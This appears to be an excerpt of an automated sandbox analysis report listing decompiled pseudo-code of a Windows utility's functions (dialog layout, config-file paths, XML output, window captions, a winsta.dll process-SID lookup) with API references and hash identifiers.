
                                                                                                                                                                                                                          C-Code - Quality: 87%
                                                                                                                                                                                                                          			E0040ABA5(intOrPtr __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                          				struct HDWP__* _v8;
                                                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                          				intOrPtr _t37;
                                                                                                                                                                                                                          				intOrPtr _t42;
                                                                                                                                                                                                                          				RECT* _t44;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_push(__ecx);
                                                                                                                                                                                                                          				_push(__ecx);
                                                                                                                                                                                                                          				_t42 = __ecx;
                                                                                                                                                                                                                          				_v12 = __ecx;
                                                                                                                                                                                                                          				if(_a4 != 5) {
                                                                                                                                                                                                                          					if(_a4 != 0xf) {
                                                                                                                                                                                                                          						if(_a4 == 0x24) {
                                                                                                                                                                                                                          							_t37 = _a12;
                                                                                                                                                                                                                          							 *((intOrPtr*)(_t37 + 0x18)) = 0xc8;
                                                                                                                                                                                                                          							 *((intOrPtr*)(_t37 + 0x1c)) = 0xc8;
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                          						E00402EC8(__ecx + 0x378);
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                          					_v8 = BeginDeferWindowPos(3);
                                                                                                                                                                                                                          					_t44 = _t42 + 0x378;
                                                                                                                                                                                                                          					E00402E22(_t44, _t21, 0x65, 0, 0, 1, 1);
                                                                                                                                                                                                                          					E00402E22(_t44, _v8, 1, 1, 1, 0, 0);
                                                                                                                                                                                                                          					E00402E22(_t44, _v8, 2, 1, 1, 0, 0);
                                                                                                                                                                                                                          					EndDeferWindowPos(_v8);
                                                                                                                                                                                                                          					InvalidateRect( *(_t44 + 0x10), _t44, 1);
                                                                                                                                                                                                                          					_t42 = _v12;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				return E00402CED(_t42, _a4, _a8, _a12);
                                                                                                                                                                                                                          			}










                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • BeginDeferWindowPos.USER32 ref: 0040ABBA
                                                                                                                                                                                                                            • Part of subcall function 00402E22: GetDlgItem.USER32 ref: 00402E32
                                                                                                                                                                                                                            • Part of subcall function 00402E22: GetClientRect.USER32 ref: 00402E44
                                                                                                                                                                                                                            • Part of subcall function 00402E22: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00402EB4
                                                                                                                                                                                                                          • EndDeferWindowPos.USER32(?), ref: 0040ABFE
                                                                                                                                                                                                                          • InvalidateRect.USER32(?,?,00000001), ref: 0040AC09
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DeferWindow$Rect$BeginClientInvalidateItem
                                                                                                                                                                                                                          • String ID: $
                                                                                                                                                                                                                          • API String ID: 2498372239-3993045852
                                                                                                                                                                                                                          • Opcode ID: 3646c4f7f2df3bce7363561434de74107494107a1dc9a7f0debf38e758269ced
                                                                                                                                                                                                                          • Instruction ID: c4de0c57513a3fc8bb763215dcca23c205eee760976c5819edcd99f4220bed98
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3646c4f7f2df3bce7363561434de74107494107a1dc9a7f0debf38e758269ced
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9A11ACB1544208FFEB229F51CD88DAF7A7CEB85788F10403EF8057A280C6758E52DBA5
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E00403A73(void* __esi, struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                                                                                                                                                                                          				int _t14;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				if(_a8 == 0x100 && _a12 == 0x41) {
                                                                                                                                                                                                                          					GetKeyState(0xa2);
                                                                                                                                                                                                                          					if(E00403A60(0xa2) != 0 || E00403A60(0xa3) != 0) {
                                                                                                                                                                                                                          						if(E00403A60(0xa0) == 0 && E00403A60(0xa1) == 0 && E00403A60(0xa4) == 0) {
                                                                                                                                                                                                                          							_t14 = E00403A60(0xa5);
                                                                                                                                                                                                                          							if(_t14 == 0) {
                                                                                                                                                                                                                          								SendMessageW(_a4, 0xb1, _t14, 0xffffffff);
                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				return CallWindowProcW( *0x40f2f0, _a4, _a8, _a12, _a16);
                                                                                                                                                                                                                          			}





                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetKeyState.USER32(000000A2), ref: 00403A8C
                                                                                                                                                                                                                            • Part of subcall function 00403A60: GetKeyState.USER32(?), ref: 00403A64
                                                                                                                                                                                                                          • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00403AF4
                                                                                                                                                                                                                          • CallWindowProcW.USER32(?,00000100,?,?), ref: 00403B0C
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: State$CallMessageProcSendWindow
                                                                                                                                                                                                                          • String ID: A
                                                                                                                                                                                                                          • API String ID: 3924021322-3554254475
                                                                                                                                                                                                                          • Opcode ID: 7a91954c753d57b62ada695ad1095f0bf88fde31d04a203a00175be824b18610
                                                                                                                                                                                                                          • Instruction ID: 3f4bab65c8f2f559ff61c6136e8e970ba349fdfc906a465d58382778652fa82c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7a91954c753d57b62ada695ad1095f0bf88fde31d04a203a00175be824b18610
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AC01483130430AAEFF11DFE59D02ADA3A5CAF15327F114036FA96B81D1DBB887506E59
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 91%
                                                                                                                                                                                                                          			E004034F0(void* __ecx, void* __eflags, intOrPtr* _a4) {
                                                                                                                                                                                                                          				intOrPtr _v20;
                                                                                                                                                                                                                          				char _v1072;
                                                                                                                                                                                                                          				void _v3672;
                                                                                                                                                                                                                          				char _v4496;
                                                                                                                                                                                                                          				intOrPtr _v4556;
                                                                                                                                                                                                                          				char _v4560;
                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                          				intOrPtr* _t41;
                                                                                                                                                                                                                          				void* _t45;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t45 = __eflags;
                                                                                                                                                                                                                          				E0040B550(0x11cc, __ecx);
                                                                                                                                                                                                                          				E00402923( &_v4560);
                                                                                                                                                                                                                          				_v4560 = 0x40db44;
                                                                                                                                                                                                                          				E00406670( &_v4496, _t45);
                                                                                                                                                                                                                          				_v4496 = 0x40dab0;
                                                                                                                                                                                                                          				memset( &_v3672, 0, 0x10);
                                                                                                                                                                                                                          				E0040A909( &_v1072);
                                                                                                                                                                                                                          				_t41 = _a4;
                                                                                                                                                                                                                          				_v4556 = 0x71;
                                                                                                                                                                                                                          				if(E00402CD5( &_v4560,  *((intOrPtr*)(_t41 + 0x10))) != 0) {
                                                                                                                                                                                                                          					L0040B266();
                                                                                                                                                                                                                          					 *((intOrPtr*)( *_t41 + 4))(1, _v20, _t41 + 0x5b2c, 0xa);
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_v4496 = 0x40dab0;
                                                                                                                                                                                                                          				_v4560 = 0x40db44;
                                                                                                                                                                                                                          				E004067AC( &_v4496);
                                                                                                                                                                                                                          				return E00402940( &_v4560);
                                                                                                                                                                                                                          			}













                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00402923: memset.MSVCRT ref: 00402935
                                                                                                                                                                                                                            • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 004066B9
                                                                                                                                                                                                                            • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 004066E0
                                                                                                                                                                                                                            • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 00406701
                                                                                                                                                                                                                            • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 00406722
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00403537
                                                                                                                                                                                                                          • _ultow.MSVCRT ref: 00403575
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ??2@$memset$_ultow
                                                                                                                                                                                                                          • String ID: cf@$q
                                                                                                                                                                                                                          • API String ID: 3448780718-2693627795
                                                                                                                                                                                                                          • Opcode ID: 5a770fb105266b5f281bf636f392918a38755f6c8491aba89f246a667f584aac
                                                                                                                                                                                                                          • Instruction ID: aa1ed1bb2df2d11c17fc3d40a8ec787ac421495c908f782690464d4e039b4fd8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5a770fb105266b5f281bf636f392918a38755f6c8491aba89f246a667f584aac
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 73113079A402186ACB24AB55DC41BCDB7B4AF45304F0084BAEB09771C1D7796E888FD8
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 83%
                                                                                                                                                                                                                          			E00402F31(void* _a4) {
                                                                                                                                                                                                                          				void _v530;
                                                                                                                                                                                                                          				long _v532;
                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                          				wchar_t* _t15;
                                                                                                                                                                                                                          				intOrPtr _t18;
                                                                                                                                                                                                                          				short* _t19;
                                                                                                                                                                                                                          				void* _t29;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_v532 = _v532 & 0x00000000;
                                                                                                                                                                                                                          				memset( &_v530, 0, 0x208);
                                                                                                                                                                                                                          				E00404AD9( &_v532);
                                                                                                                                                                                                                          				_t15 = wcsrchr( &_v532, 0x2e);
                                                                                                                                                                                                                          				if(_t15 != 0) {
                                                                                                                                                                                                                          					 *_t15 =  *_t15 & 0x00000000;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				wcscat( &_v532, L".cfg");
                                                                                                                                                                                                                          				_t18 =  *0x40fa74; // 0x4101c8
                                                                                                                                                                                                                          				_t19 = _t18 + 0x5504;
                                                                                                                                                                                                                          				_t36 =  *_t19;
                                                                                                                                                                                                                          				_pop(_t29);
                                                                                                                                                                                                                          				if( *_t19 != 0) {
                                                                                                                                                                                                                          					E00404923(0x104,  &_v532, _t19);
                                                                                                                                                                                                                          					_pop(_t29);
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				return E00402FC6(_t29, _t36,  &_v532);
                                                                                                                                                                                                                          			}










                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00402F51
                                                                                                                                                                                                                            • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                                                                                                                          • wcsrchr.MSVCRT ref: 00402F6F
                                                                                                                                                                                                                          • wcscat.MSVCRT ref: 00402F8A
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                                                                                                                                                          • String ID: .cfg
                                                                                                                                                                                                                          • API String ID: 776488737-3410578098
                                                                                                                                                                                                                          • Opcode ID: 728259185716957c59a96a9101d5f0e08b84084941d0fa3c3d1a3b0935b5c9f5
                                                                                                                                                                                                                          • Instruction ID: 9e44addaa5645187fa8e636e844442f878cb26b9c6a589516f43c5b5973a5f2a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 728259185716957c59a96a9101d5f0e08b84084941d0fa3c3d1a3b0935b5c9f5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D501487254420C9ADB20E755DD8AFCA73BCEB54314F1008BBA514F61C1D7F8AAC48A9C
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 64%
                                                                                                                                                                                                                          			E00407E24(intOrPtr* __ecx, intOrPtr _a4) {
                                                                                                                                                                                                                          				void _v514;
                                                                                                                                                                                                                          				signed short _v516;
                                                                                                                                                                                                                          				void _v1026;
                                                                                                                                                                                                                          				signed short _v1028;
                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                          				void* _t17;
                                                                                                                                                                                                                          				intOrPtr* _t26;
                                                                                                                                                                                                                          				signed short* _t28;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_v516 = _v516 & 0x00000000;
                                                                                                                                                                                                                          				_t26 = __ecx;
                                                                                                                                                                                                                          				memset( &_v514, 0, 0x1fc);
                                                                                                                                                                                                                          				_v1028 = _v1028 & 0x00000000;
                                                                                                                                                                                                                          				memset( &_v1026, 0, 0x1fc);
                                                                                                                                                                                                                          				_t17 =  *((intOrPtr*)( *_t26 + 0x24))();
                                                                                                                                                                                                                          				_t28 =  &_v516;
                                                                                                                                                                                                                          				E00407250(_t28, _t17);
                                                                                                                                                                                                                          				_push(_t28);
                                                                                                                                                                                                                          				_push(L"</%s>\r\n");
                                                                                                                                                                                                                          				_push(0xff);
                                                                                                                                                                                                                          				_push( &_v1028);
                                                                                                                                                                                                                          				L0040B1EC();
                                                                                                                                                                                                                          				return E00407343(_t26, _a4,  &_v1028);
                                                                                                                                                                                                                          			}












                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00407E48
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00407E5F
                                                                                                                                                                                                                            • Part of subcall function 00407250: wcscpy.MSVCRT ref: 00407255
                                                                                                                                                                                                                            • Part of subcall function 00407250: _wcslwr.MSVCRT ref: 00407288
                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 00407E8E
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                                                                                                                                          • String ID: </%s>
                                                                                                                                                                                                                          • API String ID: 3400436232-259020660
                                                                                                                                                                                                                          • Opcode ID: 8ed6d9153b8ab756a1282c4525cb1f33682d7d4062ac2741ec7bca21e753fd7d
                                                                                                                                                                                                                          • Instruction ID: 202c728a503fdded71e402cbdefdfedacf6d04e10f6749ebe2a15fa747ba2321
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8ed6d9153b8ab756a1282c4525cb1f33682d7d4062ac2741ec7bca21e753fd7d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 820186B2D4012966D720A795CC46FEE766CEF44318F0004FABB08F71C2DB78AB458AD8
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 77%
                                                                                                                                                                                                                          			E00405E0A(intOrPtr __ecx, void* __eflags, struct HWND__* _a4) {
                                                                                                                                                                                                                          				void _v8198;
                                                                                                                                                                                                                          				short _v8200;
                                                                                                                                                                                                                          				void* _t9;
                                                                                                                                                                                                                          				void* _t12;
                                                                                                                                                                                                                          				intOrPtr _t19;
                                                                                                                                                                                                                          				intOrPtr _t20;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t19 = __ecx;
                                                                                                                                                                                                                          				_t9 = E0040B550(0x2004, __ecx);
                                                                                                                                                                                                                          				_t20 = _t19;
                                                                                                                                                                                                                          				if(_t20 == 0) {
                                                                                                                                                                                                                          					_t20 =  *0x40fe24; // 0x0
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_t25 =  *0x40fb90;
                                                                                                                                                                                                                          				if( *0x40fb90 != 0) {
                                                                                                                                                                                                                          					_v8200 = _v8200 & 0x00000000;
                                                                                                                                                                                                                          					memset( &_v8198, 0, 0x2000);
                                                                                                                                                                                                                          					_push(_t20);
                                                                                                                                                                                                                          					_t12 = 5;
                                                                                                                                                                                                                          					E00405E8D(_t12);
                                                                                                                                                                                                                          					if(E00405F39(_t19, _t25, L"caption",  &_v8200) != 0) {
                                                                                                                                                                                                                          						SetWindowTextW(_a4,  &_v8200);
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					return EnumChildWindows(_a4, E00405DAC, 0);
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				return _t9;
                                                                                                                                                                                                                          			}










                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ChildEnumTextWindowWindowsmemset
                                                                                                                                                                                                                          • String ID: caption
                                                                                                                                                                                                                          • API String ID: 1523050162-4135340389
                                                                                                                                                                                                                          • Opcode ID: 8feeb8209b6c70e9adfa8bd3f92da79707fac4aecb0355a736b6ddf0df3d27b2
                                                                                                                                                                                                                          • Instruction ID: ff9fcce37bd20e8a069aa1bb12297d26d3abb42d57bfe77991e9b0a8e19eae59
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8feeb8209b6c70e9adfa8bd3f92da79707fac4aecb0355a736b6ddf0df3d27b2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2DF04432940718AAEB20AB54DD4EB9B3668DB04754F0041B7BA04B61D2D7B8AE40CEDC
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E00409A46(struct HINSTANCE__** __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                                                                                                                                                          				struct HINSTANCE__* _t11;
                                                                                                                                                                                                                          				struct HINSTANCE__** _t14;
                                                                                                                                                                                                                          				struct HINSTANCE__* _t15;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t14 = __eax;
                                                                                                                                                                                                                          				if( *((intOrPtr*)(__eax)) == 0) {
                                                                                                                                                                                                                          					_t11 = E00405436(L"winsta.dll");
                                                                                                                                                                                                                          					 *_t14 = _t11;
                                                                                                                                                                                                                          					if(_t11 != 0) {
                                                                                                                                                                                                                          						_t14[1] = GetProcAddress(_t11, "WinStationGetProcessSid");
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_t15 = _t14[1];
                                                                                                                                                                                                                          				if(_t15 == 0) {
                                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                          					return _t15->i(0, _a4, _a16, _a20, _a8, _a12);
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          			}







                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                                                                                                                                            • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                                                                                                                                            • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                                                                                                                            • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,WinStationGetProcessSid), ref: 00409A68
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: LibraryLoad$AddressProcmemsetwcscat
                                                                                                                                                                                                                          • String ID: WinStationGetProcessSid$winsta.dll$Y@
                                                                                                                                                                                                                          • API String ID: 946536540-379566740
                                                                                                                                                                                                                          • Opcode ID: 1b7ebfe453553e3f98933d91fdad94fbea9a23791565fec376d5a3071c2edda0
                                                                                                                                                                                                                          • Instruction ID: f8fd4ca1437852706c932511ef9fc121d1f4ef25cad53c4396aefa54a2cc69ea
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1b7ebfe453553e3f98933d91fdad94fbea9a23791565fec376d5a3071c2edda0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4AF08236644219AFCF219FE09C01B977BD5AB08710F00443AF945B21D1D67588509F98
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 93%
                                                                                                                                                                                                                          			E0040588E(void** __esi, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                                          				signed int _t21;
                                                                                                                                                                                                                          				signed int _t23;
                                                                                                                                                                                                                          				void* _t24;
                                                                                                                                                                                                                          				signed int _t31;
                                                                                                                                                                                                                          				void* _t33;
                                                                                                                                                                                                                          				void* _t44;
                                                                                                                                                                                                                          				signed int _t46;
                                                                                                                                                                                                                          				void* _t48;
                                                                                                                                                                                                                          				signed int _t51;
                                                                                                                                                                                                                          				int _t52;
                                                                                                                                                                                                                          				void** _t53;
                                                                                                                                                                                                                          				void* _t58;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t53 = __esi;
                                                                                                                                                                                                                          				_t1 =  &(_t53[1]); // 0x0
                                                                                                                                                                                                                          				_t51 =  *_t1;
                                                                                                                                                                                                                          				_t21 = 0;
                                                                                                                                                                                                                          				if(_t51 <= 0) {
                                                                                                                                                                                                                          					L4:
                                                                                                                                                                                                                          					_t2 =  &(_t53[2]); // 0x8
                                                                                                                                                                                                                          					_t33 =  *_t53;
                                                                                                                                                                                                                          					_t23 =  *_t2 + _t51;
                                                                                                                                                                                                                          					_t46 = 8;
                                                                                                                                                                                                                          					_t53[1] = _t23;
                                                                                                                                                                                                                          					_t24 = _t23 * _t46;
                                                                                                                                                                                                                          					_push( ~(0 | _t58 > 0x00000000) | _t24);
                                                                                                                                                                                                                          					L0040B26C();
                                                                                                                                                                                                                          					_t10 =  &(_t53[1]); // 0x0
                                                                                                                                                                                                                          					 *_t53 = _t24;
                                                                                                                                                                                                                          					memset(_t24, 0,  *_t10 << 3);
                                                                                                                                                                                                                          					_t52 = _t51 << 3;
                                                                                                                                                                                                                          					memcpy( *_t53, _t33, _t52);
                                                                                                                                                                                                                          					if(_t33 != 0) {
                                                                                                                                                                                                                          						_push(_t33);
                                                                                                                                                                                                                          						L0040B272();
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					 *((intOrPtr*)( *_t53 + _t52)) = _a4;
                                                                                                                                                                                                                          					 *((intOrPtr*)(_t52 +  *_t53 + 4)) = _a8;
                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                          					_t44 =  *__esi;
                                                                                                                                                                                                                          					_t48 = _t44;
                                                                                                                                                                                                                          					while( *_t48 != 0) {
                                                                                                                                                                                                                          						_t21 = _t21 + 1;
                                                                                                                                                                                                                          						_t48 = _t48 + 8;
                                                                                                                                                                                                                          						_t58 = _t21 - _t51;
                                                                                                                                                                                                                          						if(_t58 < 0) {
                                                                                                                                                                                                                          							continue;
                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                          							goto L4;
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						goto L7;
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					_t31 = _t21 << 3;
                                                                                                                                                                                                                          					 *((intOrPtr*)(_t44 + _t31)) = _a4;
                                                                                                                                                                                                                          					 *((intOrPtr*)(_t31 +  *_t53 + 4)) = _a8;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				L7:
                                                                                                                                                                                                                          				return 1;
                                                                                                                                                                                                                          			}















                                                                                                                                                                                                                          0x004058ec
                                                                                                                                                                                                                          0x004058ed
                                                                                                                                                                                                                          0x004058f2
                                                                                                                                                                                                                          0x004058f9
                                                                                                                                                                                                                          0x00405902
                                                                                                                                                                                                                          0x00405898
                                                                                                                                                                                                                          0x00405898
                                                                                                                                                                                                                          0x0040589a
                                                                                                                                                                                                                          0x0040589c
                                                                                                                                                                                                                          0x004058a1
                                                                                                                                                                                                                          0x004058a2
                                                                                                                                                                                                                          0x004058a5
                                                                                                                                                                                                                          0x004058a7
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x004058a7
                                                                                                                                                                                                                          0x00405912
                                                                                                                                                                                                                          0x00405915
                                                                                                                                                                                                                          0x0040591e
                                                                                                                                                                                                                          0x0040591e
                                                                                                                                                                                                                          0x00405907
                                                                                                                                                                                                                          0x0040590b

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ??2@??3@memcpymemset
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1865533344-0
                                                                                                                                                                                                                          • Opcode ID: 842e7f25b611a1b365b40b1c94d0ccd91a374462c013338e9ea48621bac1a915
